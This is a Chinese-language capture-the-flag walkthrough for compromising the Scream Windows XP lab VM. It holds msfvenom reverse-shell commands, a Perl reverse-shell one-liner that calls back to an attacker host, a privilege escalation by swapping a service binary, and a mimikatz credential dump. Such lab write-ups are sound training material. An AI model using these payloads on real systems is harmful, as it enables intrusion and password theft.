/dev/random:scream Walkthrough
Reconnaissance
Host Discovery
1
2
3
4
5
6
┌──(root㉿kali)-[~]
└─# nmap -sn 10.0.0.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-22 03:30 EDT
Nmap scan report for 10.0.0.131
Host is up (0.00036s latency).
MAC Address: 00:0C:29:62:2F:C7 (VMware)
Port Scanning
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(root㉿kali)-[~]
└─# nmap -p- -sS -sV -sC 10.0.0.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-22 03:30 EDT
Nmap scan report for 10.0.0.131
Host is up (0.00034s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp WAR-FTPD 1.65 (Name Scream XP (SP2) FTP Service)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 1 ftp ftp 0 Aug 19 15:50 bin
| drwxr-xr-x 1 ftp ftp 0 Aug 19 15:53 log
|_drwxr-xr-x 1 ftp ftp 0 Aug 19 15:50 root
|_ftp-bounce: bounce working!
22/tcp open ssh WeOnlyDo sshd 2.1.3 (protocol 2.0)
| ssh-hostkey:
| 1024 2c:23:77:67:d3:e0:ae:2a:a8:01:a4:9e:54:97:db:2c (DSA)
|_ 1024 fa:11:a5:3d:63:95:4a:ae:3e:16:49:2f:bb:4b:f1:de (RSA)
23/tcp open telnet
80/tcp open http Tinyweb httpd 1.93
|_http-server-header: TinyWeb/1.93
|_http-title: The Scream - Edvard Munch
MAC Address: 00:0C:29:62:2F:C7 (VMware)
Enumeration
Ftp Enumeration
我使用username:anonymous, password:[empty]进行登陆,并查看所有存在的内容
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
┌──(root㉿kali)-[~]
└─# ftp 10.0.0.131
Connected to 10.0.0.131.
220- Scream XP (SP2) FTP Service WAR-FTPD 1.65 Ready
220 Please enter your user name.
Name (10.0.0.131:kali): anonymous
331 Password required for anonymous
Password:
230 Logged on
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||1033|)
150 Connection accepted
drwxr-xr-x 1 ftp ftp 0 Jul 22 15:02 bin
drwxr-xr-x 1 ftp ftp 0 Jul 22 15:05 log
drwxr-xr-x 1 ftp ftp 0 Jul 22 15:02 root
226 Transfer OK
ftp> cd /bin
250 CWD successful. "/bin" is current directory.
ftp> ls -la
229 Entering Extended Passive Mode (|||1034|)
150 Connection accepted
---------- 1 ftp ftp 12735 Jan 05 2006 CGITEST.ZIP
---------- 1 ftp ftp 69 Mar 31 2009 FILE_ID.DIZ
---------- 1 ftp ftp 2175 Mar 31 2009 LICENCE.TXT
---------- 1 ftp ftp 60 Jan 05 2006 README.TXT
---------- 1 ftp ftp 146091 Mar 31 2009 SRC.ZIP
---x--x--x 1 ftp ftp 68856 Mar 31 2009 TINY.EXE
226 Transfer OK
ftp> cd ../log
250 CWD successful. "/log" is current directory.
ftp> ls -la
229 Entering Extended Passive Mode (|||1035|)
150 Connection accepted
---------- 1 ftp ftp 4620 Jul 22 15:31 access_log
---------- 1 ftp ftp 0 Jul 22 15:05 agent_log
---------- 1 ftp ftp 0 Jul 22 15:05 error_log
---------- 1 ftp ftp 674 Nov 01 2012 OpenTFTPServerMT.log
---------- 1 ftp ftp 0 Jul 22 15:05 referer_log
226 Transfer OK
ftp> cd ../root
250 CWD successful. "/root" is current directory.
ftp> ls -la
229 Entering Extended Passive Mode (|||1036|)
150 Connection accepted
drwxr-xr-x 1 ftp ftp 0 Feb 08 2013 cgi-bin
---------- 1 ftp ftp 14539 Oct 31 2012 index.html
226 Transfer OK
ftp> cd cgi-bin
250 CWD successful. "/root/cgi-bin" is current directory.
ftp> ls -la
229 Entering Extended Passive Mode (|||1037|)
150 Connection accepted
226 Transfer OK
ftp>
/bin目录中发现TINY.EXE,这可能与Tinyweb httpd服务相关
/log目录中发现OpenTFTPServerMT.log,这表明这台机器可能运行TFTP
/root目录中发现cgi-bin和index.html,这可能是存在Tinyweb httpd的数据
我尝试对cgi-bin目录进行访问,但其中没有任何数据
我也尝试对文件进行get,提示我没有任何的权限
Tftp Enumeration
这里我做了一个快速测试,我先创建了一个测试文件,并上传
1
2
3
4
5
┌──(root㉿kali)-[~]
└─# touch tftp_via_test
┌──(root㉿kali)-[~]
└─# tftp 10.0.0.131
tftp> put tftp_via_test
我重新进入ftp并在root目录下发现我刚上传的测试文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kali)-[~]
└─# ftp 10.0.0.131
Connected to 10.0.0.131.
220- Scream XP (SP2) FTP Service WAR-FTPD 1.65 Ready
220 Please enter your user name.
Name (10.0.0.131:kali): anonymous
331 Password required for anonymous
Password:
230 Logged on
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /root
250 CWD successful. "/root" is current directory.
ftp> ls -la
229 Entering Extended Passive Mode (|||1040|)
150 Connection accepted
drwxr-xr-x 1 ftp ftp 0 Feb 08 2013 cgi-bin
---------- 1 ftp ftp 14539 Oct 31 2012 index.html
---------- 1 ftp ftp 0 Jul 22 15:49 tftp_via_test
226 Transfer OK
Exploiting
Exploiting TFTP
由于TFTP服务直接指向到了Web根目录,我使用msfvenom创建了一个反向TCP Shell
1
2
3
4
5
6
7
┌──(root㉿kali)-[~]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.129 LPORT=80 -e x86/shikata_ga_nai -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: shell.exe
使用TFTP对其进行上传,这里注意一定要使用binary模式
1
2
3
4
5
6
┌──(root㉿kali)-[~]
└─# tftp 10.0.0.131
tftp> binary
tftp> mode
Using octet mode to transfer files.
tftp> put shell.exe cgi-bin/shell.exe
接着使用netcat对端口进行监听
1
2
3
┌──(root㉿kali)-[~]
└─# nc -v -l -p 80
listening on [any] 80 ...
最后这里我是用curl来访问调用可执行文件,但是没有生效,由此可以判断无法执行可执行文件
1
2
┌──(root㉿kali)-[~]
└─# curl http://10.0.0.131/cgi-bin/shell.exe
我尝试使用另一个反向TCP Payload
1
2
3
4
5
6
7
┌──(root㉿kali)-[~]
└─# msfvenom -p cmd/windows/reverse_perl LHOST=10.0.0.129 LPORT=4444 -o shell.pl
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 143 bytes
Saved as: shell.pl
由于默认的脚本内容是要在cmd中执行的,我们需要对内容进行修改,才能有效的执行。
1
2
3
4
#原内容
perl -MIO -e "$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"10.0.0.129:4444\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"
#修改后的脚本
use IO::Socket::INET;$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.0.0.129:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;
使用上面同样的方法,将修改后的脚本进行上传,并成功执行
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿kali)-[~]
└─# nc -v -l -p 4444
listening on [any] 4444 ...
10.0.0.131: inverse host lookup failed: Unknown host
connect to [10.0.0.129] from (UNKNOWN) [10.0.0.131] 1046
dir
Volume in drive C has no label.
Volume Serial Number is 90EA-1E7C
Directory of c:\www\root\cgi-bin
07/22/2024 04:43 PM <DIR> .
07/22/2024 04:43 PM <DIR> ..
07/22/2024 04:03 PM 324 shell.exe
07/22/2024 04:43 PM 148 shell.pl
2 File(s) 472 bytes
2 Dir(s) 40,106,590,208 bytes free
echo %username%
alex
Privilege Escalation
由于之前perl脚本是基础的shell,运行之前上传的shell.exe启动另一个shell
1
2
3
4
5
6
7
8
9
10
11
12
13
#perl shell
shell.exe
#kali linux
┌──(root㉿kali)-[~]
└─# nc -lvp 80
listening on [any] 80 ...
10.0.0.131: inverse host lookup failed: Unknown host
connect to [10.0.0.129] from (UNKNOWN) [10.0.0.131] 1048
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
c:\www\root\cgi-bin>
查看当前进程列表发现有三个服务以 SYSTEM 权限运行
1
2
3
4
5
6
7
8
9
c:\www\root\cgi-bin>tasklist /FI "username eq SYSTEM"
tasklist /FI "username eq SYSTEM"
Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
......
FileZilla server.exe 1988 Console 0 3,028 K
FreeSSHDService.exe 2020 Console 0 4,384 K
OpenTFTPServerMT.exe 192 Console 0 1,844 K
接下来,查看了正在运行的服务列表,并能够识别这三个进程的服务名称:
1
2
3
4
5
6
7
8
9
10
11
c:\www\root\cgi-bin>net start
net start
These Windows services are started:
......
FileZilla Server FTP server
FreeSSHDService
......
Open TFTP Server, MultiThreaded
......
The command completed successfully.
这里成功将FileZilla 服务停止
1
2
3
4
C:\Program Files\FileZilla Server>net stop "FileZilla Server FTP Server"
net stop "FileZilla Server FTP Server"
The FileZilla Server FTP server service is stopping.
The FileZilla Server FTP server service was stopped successfully.
服务停止后,检查当前登录的用户是否能够重命名服务的目标可执行文件,成功重命名
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
C:\Program Files\FileZilla Server>cd C:\Program Files\FileZilla Server
C:\Program Files\FileZilla Server>dir
***
02/26/2012 07:42 AM 632,320 FileZilla server.exe
***
C:\Program Files\FileZilla Server>move "FileZilla server.exe" "FileZilla server.exe.bak"
***
02/26/2012 07:42 AM 632,320 FileZilla server.exe.bak
***
C:\Program Files\FileZilla Server>move C:\www\root\cgi-bin\shell_bak.exe "FileZilla server.exe"
再一次使用msfvenom重新生成一个反弹TCP shell,端口设置为6657按之前的方法进行上传,这里不再啰嗦
将上传的文件,进行重命名为FileZilla server.exe,重新启动服务,成功拿到Shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#kali linux
┌──(root㉿kali)-[~]
└─# nc -lvp 6657
listening on [any] 6657 ...
#TCP shell
C:\Program Files\FileZilla Server>move C:\www\root\cgi-bin\shell_bak.exe "FileZilla server.exe"
C:\Program Files\FileZilla Server>net start "FileZilla Server FTP Server"
#kali linux
┌──(root㉿kali)-[~]
└─# nc -lvp 6657
listening on [any] 6657 ...
10.0.0.131: inverse host lookup failed: Unknown host
connect to [10.0.0.129] from (UNKNOWN) [10.0.0.131] 1054
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
最后依然按TFTP文件上传方法,将 minikatz.exe文件进行上传,成功获取到密码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
C:\www\root>mimikatz.exe
mimikatz.exe
.#####. mimikatz 2.2.0 (x86) #19041 Sep 19 2022 17:43:26
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 47320 (00000000:0000b8d8)
Session : Interactive from 0
User Name : alex
Domain : SCREAM
Logon Server : SCREAM
Logon Time : 7/22/2024 8:09:49 PM
SID : S-1-5-21-1659004503-1482476501-725345543-1003
msv :
[00000002] Primary
* Username : alex
* Domain : SCREAM
* NTLM : 504182f8417ed8557b67e96adc8b4d04
* SHA1 : c84389be8e78f275c4530b00ba54aea1cbd347f7
wdigest :
* Username : alex
* Domain : SCREAM
* Password : thisisaverylongpassword
kerberos :
* Username : alex
* Domain : SCREAM
* Password : thisisaverylongpassword
This post is licensed under
CC BY 4.0
by the author.